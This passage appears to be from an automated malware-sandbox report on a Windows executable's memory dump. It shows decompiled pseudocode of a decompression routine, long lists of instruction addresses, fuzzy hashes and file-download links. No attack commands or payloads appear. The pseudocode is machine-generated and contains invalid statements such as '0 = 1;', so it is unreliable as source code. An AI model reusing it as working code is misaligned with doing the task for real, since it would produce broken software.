												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406945
0x00406945
0x00406945
0x00406945
0x00406945
0x00406949
0x00000000
0x00000000
0x0040694f
0x0040694f
0x00406952
0x00406955
0x0040695a
0x0040695c
0x0040695f
0x00406962
0x00406965
0x00406965
0x00406968
0x00000000
0x00000000
0x0040696a
0x0040696a
0x0040696d
0x00406972
0x00406974
0x00406977
0x0040697d
0x004066dc
0x004066dc
0x004066df
0x004066e5
0x004066eb
0x004066f4
0x004066fa
0x004066fd
0x00406704
0x00406709
0x0040670f
0x0040671a
0x0040671a
0x00406983
0x00406983
0x0040698d
0x00000000
0x00000000
0x00406993
0x00406993
0x00406997
0x0040699a
0x0040699a
0x0040699e
0x004069a4
0x004069a4
0x004069a7
0x004069aa
0x004069b0
0x00000000
0x00000000
0x004069b2
0x004069d4
0x004069d4
0x004069d7
0x00000000
0x00000000
0x004069b4
0x004069b8
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c1
0x004069c4
0x004069c9
0x004069cb
0x004069ce
0x004069d1
0x004069d1
0x004069d9
0x004069d9
0x004069df
0x004069e2
0x004069e5
0x004069e5
0x004069ec
0x004069f0
0x004069f4
0x004069f7
0x004069fa
0x00406a00
0x00406a05
0x00000000
0x00000000
0x00406a07
0x00406a1b
0x00406a1b
0x00406a1f
0x00000000
0x00000000
0x00406a09
0x00406a0c
0x00406a0c
0x00406a13
0x00406a18
0x00406a18
0x00406a18
0x00406a21
0x00406a21
0x00406a24
0x00406a32
0x00406a38
0x00406a3d
0x00406a43
0x00406a49
0x00406a4f
0x00406a56
0x00406a6a
0x00406a6a
0x00407039
0x00407039
0x00407039
0x0040703e
0x00000000
0x00000000
0x00406676
0x00406676
0x00000000
0x00406c71
0x00406c71
0x00406c75
0x00406c78
0x00406c7b
0x00406c7e
0x00000000
0x00000000
0x00406c84
0x00406c84
0x00406ca9
0x00406ca9
0x00406ca9
0x00406cab
0x00000000
0x00000000
0x00406c89
0x00406c89
0x00406c8d
0x00000000
0x00000000
0x00406c93
0x00406c93
0x00406c96
0x00406c99
0x00406c9c
0x00406c9e
0x00406ca0
0x00406ca3
0x00406ca6
0x00406ca6
0x00406ca6
0x00406cad
0x00406cad
0x00406cb5
0x00406cb8
0x00406cbb
0x00406cbe
0x00406cc2
0x00406cc5
0x00406cc7
0x00406cca
0x00406ccc
0x00406ce0
0x00406ce0
0x00406ce3
0x00406cfd
0x00406cfd
0x00406d00
0x00000000
0x00000000
0x00406d06
0x00406d06
0x00406d09
0x00000000
0x00000000
0x00406d0f
0x00406d0f
0x00000000
0x00406d0f
0x00406ce5
0x00406ce8
0x00406cef
0x00406cf2
0x00000000
0x00406cf2
0x00406cce
0x00406cd2
0x00406cd5
0x00000000
0x00000000
0x00406d1a
0x00406d1a
0x00406d3f
0x00406d3f
0x00406d3f
0x00406d41
0x00000000
0x00000000
0x00406d1f
0x00406d1f
0x00406d23
0x00000000
0x00000000
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d34
0x00406d36
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3c
0x00406d43
0x00406d4b
0x00406d4e
0x00406d51
0x00406d53
0x00406d56
0x00406d56
0x00406d58
0x00406d5c
0x00406d5f
0x00406d62
0x00406d65
0x00000000
0x00000000
0x00406d6b
0x00406d6b
0x00406d90
0x00406d90
0x00406d90
0x00406d92
0x00000000
0x00000000
0x00406d70
0x00406d70
0x00406d74
0x00000000
0x00000000
0x00406d7a
0x00406d7a
0x00406d7d
0x00406d80
0x00406d83
0x00406d85
0x00406d87
0x00406d8a
0x00406d8d
0x00406d8d
0x00406d8d
0x00406d94
0x00406d94
0x00406d9c
0x00406d9f
0x00406da2
0x00406da5
0x00406da9
0x00406dac
0x00406dae
0x00406db1
0x00406db4
0x00406dce
0x00406dce
0x00406dd1
0x00000000
0x00000000
0x00406dd7
0x00406dd7
0x00406dda
0x00406de1
0x00000000
0x00406de1
0x00406db6
0x00406db9
0x00406dc0
0x00406dc3
0x00000000
0x00000000
0x00406de9
0x00406de9
0x00406e0e
0x00406e0e
0x00406e0e
0x00406e10
0x00000000
0x00000000
0x00406dee
0x00406dee
0x00406df2
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfb
0x00406dfe
0x00406e01
0x00406e03
0x00406e05
0x00406e08
0x00406e0b
0x00406e0b
0x00406e0b
0x00406e12
0x00406e1a
0x00406e1d
0x00406e20
0x00406e22
0x00406e25
0x00406e25
0x00406e27
0x00000000
0x00000000
0x00406e2d
0x00406e2d
0x00406e30
0x00406e35
0x00406e37
0x00406e3d
0x00406e3f
0x00406e54
0x00406e56
0x00406e56
0x00406e41
0x00406e47
0x00406e49
0x00406e4b
0x00406e4b
0x00406e58
0x00406e5c
0x00406e5f
0x00406e65
0x00406e65
0x00406e68
0x00406e68
0x00406e68
0x00406e6a
0x00000000
0x00000000
0x00406e70
0x00406e70
0x00406e76
0x00406e78
0x00406e9d
0x00406ea0
0x00406ea6
0x00406eab
0x00406eb1
0x00406eb7
0x00406eb9
0x00406ebc
0x00406ec5
0x00406ecb
0x00406ecb
0x00406ebe
0x00406ec0
0x00406ec2
0x00406ec2
0x00406ecd
0x00406ed3
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee0
0x00406ee2
0x00406ee4
0x00406ee6
0x00406ee8
0x00406eeb
0x00406ef4
0x00406ef7
0x00406ef7
0x00406eed
0x00406eed
0x00406ef0
0x00406ef0
0x00406eeb
0x00406ee2
0x00406ef9
0x00406efb
0x00000000
0x00000000
0x00000000
0x00000000
0x00406efb
0x00406e7a
0x00406e7a
0x00406e80
0x00406e86
0x00406e88
0x00000000
0x00000000
0x00406e8a
0x00406e8a
0x00406e8c
0x00406e8e
0x00406e97
0x00406e97
0x00406e90
0x00406e90
0x00406e93
0x00406e93
0x00406e99
0x00406e9b
0x00000000
0x00000000
0x00406f01
0x00406f01
0x00406f06
0x00406f08
0x00406f09
0x00406f0a
0x00406f0b
0x00406f11
0x00406f14
0x00406f17
0x00406f1a
0x00406f1c
0x00406f22
0x00406f22
0x00406f25
0x00406f25
0x00406f25
0x00406f25
0x00406f2e
0x00000000
0x00000000
0x00406f33
0x00406f33
0x00406f36
0x00406f39
0x00406f3b
0x00406fd2
0x00406fd2
0x00406fd5
0x00406fd7
0x00406fd8
0x00406fd9
0x00406fdc
0x00000000
0x00406fdc
0x00406f41
0x00406f41
0x00406f47
0x00406f49
0x00406f6e
0x00406f71
0x00406f77
0x00406f7c
0x00406f82
0x00406f88
0x00406f8a
0x00406f8d
0x00406f96
0x00406f9c
0x00406f9c
0x00406f8f
0x00406f91
0x00406f93
0x00406f93
0x00406f9e
0x00406fa4
0x00406fa6
0x00406fa9
0x00406fab
0x00406fb1
0x00406fb3
0x00406fb5
0x00406fb7
0x00406fb9
0x00406fbc
0x00406fc5
0x00406fc8
0x00406fc8
0x00406fbe
0x00406fbe
0x00406fc1
0x00406fc1
0x00406fbc
0x00406fb3
0x00406fca
0x00406fcc
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fcc
0x00406f4b
0x00406f4b
0x00406f51
0x00406f57
0x00406f59
0x00000000
0x00000000
0x00406f5b
0x00406f5b
0x00406f5d
0x00406f5f
0x00406f66
0x00406f66
0x00406f68
0x00406f61
0x00406f61
0x00406f63
0x00406f63
0x00406f6a
0x00406f6c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe4
0x00406fe4
0x00406fe7
0x00406fe9
0x00406fec
0x00406fef
0x00406fef
0x00406fef
0x00406fef
0x00000000
0x00000000
0x00000000
0x0040669d
0x00406681
0x00000000
0x00406687
0x0040668a
0x00406694
0x00406697
0x0040669a
0x00000000
0x0040669a
0x00406681
0x004066a5
0x004066a8
0x004066ac
0x004066b6
0x004066c0
0x004066c3
0x004066c9
0x004067fd
0x004067ff
0x00406805
0x00406808
0x0040680b
0x00000000
0x0040680b
0x004066cf
0x004066cf
0x004066d0
0x00406728
0x00406728
0x0040672f
0x004067d5
0x004067d5
0x004067da
0x004067dd
0x004067e2
0x004067e5
0x004067ea
0x004067ed
0x004067f2
0x004067f5
0x004067f5
0x00000000
0x00406735
0x00406735
0x00406735
0x00406735
0x00406739
0x00406739
0x0040675b
0x0040675e
0x00406760
0x00406763
0x00406768
0x0040673e
0x0040673e
0x00406743
0x00406745
0x00406747
0x0040674c
0x00406752
0x00406757
0x00406759
0x00406759
0x0040674e
0x0040674e
0x0040674e
0x0040674c
0x00000000
0x0040676a
0x00406797
0x0040679c
0x0040679e
0x0040679f
0x004067a1
0x004067a2
0x004067a2
0x004067a2
0x004067ca
0x004067cf
0x004067cf
0x00000000
0x004067cf
0x00406768
0x0040672f
0x004066d2
0x004066d2
0x004066d3
0x0040671d
0x00000000
0x0040671d
0x004066d5
0x004066d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00406832
0x00406832
0x00406832
0x00406835
0x00000000
0x00000000
0x00406812
0x00406812
0x00406816
0x00000000
0x00000000
0x0040681c
0x0040681c
0x0040681f
0x00406822
0x00406827
0x00406829
0x0040682c
0x0040682f
0x0040682f
0x0040682f
0x00406837
0x00406837
0x0040683a
0x0040683c
0x00406841
0x00406844
0x00406846
0x00406849
0x00000000
0x00000000
0x0040684f
0x0040684f
0x00406851
0x00000000
0x00000000
0x00406857
0x00406857
0x0040685b
0x00000000
0x00000000
0x00406861
0x00406861
0x00406864
0x00406866
0x00406904
0x00406904
0x00406907
0x00406909
0x00406909
0x0040690c
0x0040690f
0x00406911
0x00406913
0x00406915
0x00406915
0x0040691e
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692f
0x0040692f
0x0040692f
0x00406932
0x00406938
0x00406938
0x0040693e
0x0040693e
0x0040693e
0x00000000
0x00406932
0x0040686c
0x0040686c
0x00406872
0x00406875
0x00406877
0x004068a2
0x004068a5
0x004068ab
0x004068b0
0x004068b6
0x004068bc
0x004068be
0x004068c1
0x004068ca
0x004068d0
0x004068d0
0x004068c3
0x004068c5
0x004068c7
0x004068c7
0x004068d2
0x004068d8
0x004068db
0x004068dd
0x004068df
0x004068e5
0x004068e7
0x004068e9
0x004068ec
0x004068f5
0x004068f5
0x004068f7
0x004068ee
0x004068ee
0x004068f1
0x004068f1
0x004068f9
0x004068f9
0x004068e7
0x004068fc
0x004068fe
0x00000000
0x00000000
0x00000000
0x00000000
0x004068fe
0x00406879
0x00406879
0x0040687f
0x00406885
0x00406887
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688b
0x0040688d
0x00406890
0x00406897
0x00406897
0x00406899
0x00406892
0x00406892
0x00406894
0x00406894
0x0040689b
0x0040689d
0x004068a0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a4
0x004069a7
0x004069aa
0x004069b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b87
0x00406b87
0x00406b87
0x00406b8a
0x00406b8d
0x00406b8f
0x00406b92
0x00406b98
0x00406b9f
0x00406ba1
0x00000000
0x00000000
0x00406a75
0x00406a75
0x00406a9d
0x00406a9d
0x00406a9d
0x00406a9f
0x00000000
0x00000000
0x00406a7d
0x00406a7d
0x00406a81
0x00000000
0x00000000
0x00406a87
0x00406a87
0x00406a8a
0x00406a8d
0x00406a90
0x00406a92
0x00406a94
0x00406a97
0x00406a9a
0x00406a9a
0x00406a9a
0x00406aa1
0x00406aa1
0x00406aa9
0x00406aac
0x00406ab2
0x00406ab5
0x00406ab9
0x00406abd
0x00406ac0
0x00406ac3
0x00406adb
0x00406adb
0x00406ade
0x00406aec
0x00406aef
0x00406ae0
0x00406ae0
0x00406ae2
0x00406ae9
0x00406ae9
0x00406b18
0x00406b18
0x00406b18
0x00406b1b
0x00406b1d
0x00000000
0x00000000
0x00406af8
0x00406af8
0x00406afc
0x00000000
0x00000000
0x00406b02
0x00406b02
0x00406b05
0x00406b08
0x00406b0b
0x00406b0d
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b15
0x00406b1f
0x00406b1f
0x00406b21
0x00406b23
0x00406b2e
0x00406b31
0x00406b34
0x00406b36
0x00406b38
0x00406b3a
0x00406b3d
0x00406b40
0x00406b45
0x00406b48
0x00406b4b
0x00406b4e
0x00406b55
0x00406b58
0x00406b5a
0x00000000
0x00000000
0x00406b60
0x00406b60
0x00406b64
0x00406b75
0x00406b75
0x00406b75
0x00406b77
0x00406b77
0x00406b7b
0x00406b7b
0x00406b7b
0x00406b7d
0x00406b7e
0x00406b81
0x00406b81
0x00406b81
0x00406b84
0x00000000
0x00406b84
0x00406b66
0x00406b66
0x00406b69
0x00000000
0x00000000
0x00406b6f
0x00406b6f
0x00000000
0x00406b6f
0x00406ac5
0x00406ac5
0x00406ac7
0x00406ac9
0x00406acc
0x00406acf
0x00406ad3
0x00406ad3
0x00406ba7
0x00406ba7
0x00406baa
0x00406bb1
0x00406bb5
0x00406bb7
0x00406bba
0x00406bbd
0x00406bc2
0x00406bc5
0x00406bc7
0x00406bc8
0x00406bcb
0x00406bd6
0x00406bd9
0x00406bf0
0x00406bf5
0x00406bfc
0x00406c01
0x00406c05
0x00406c07
0x00406c07
0x00406c07
0x00406c0a
0x00406c0c
0x00000000
0x00406c12
0x00406c12
0x00406c16
0x00406c21
0x00406c34
0x00406c39
0x00406c3e
0x00406c40
0x00000000
0x00000000
0x00406c46
0x00406c46
0x00406c49
0x00406c4b
0x00406c59
0x00406c59
0x00406c5c
0x00406c5c
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00000000
0x00406c6e
0x00406c4d
0x00406c4d
0x00406c53
0x00000000
0x00000000
0x00000000
0x00406c53
0x00000000
0x00000000
0x00000000
0x00406ff2
0x00406ff2
0x00406ff8
0x00406ffe
0x00407003
0x00407009
0x0040700f
0x00407011
0x00407014
0x0040701d
0x00407023
0x00407023
0x00407016
0x00407018
0x0040701a
0x0040701a
0x00407025
0x00407027
0x0040702a
0x00407065
0x00407065
0x00000000
0x0040702c
0x0040702c
0x0040702c
0x00407032
0x00407035
0x00407037
0x0040706c
0x0040706e
0x00000000
0x0040706e
0x00000000
0x00407037
0x00000000
0x00406676
0x00407044
0x00000000
0x00407044
0x00406a58
0x00406a5a
0x00000000
0x00000000
0x00406a5c
0x00406a5c
0x00406a5f
0x00000000
0x00406a5f
0x004069a4
0x00406965
0x00407049
0x0040704c
0x0040704e
0x00407057
0x0040705d
0x00000000

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040711C, Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6a8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6a8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
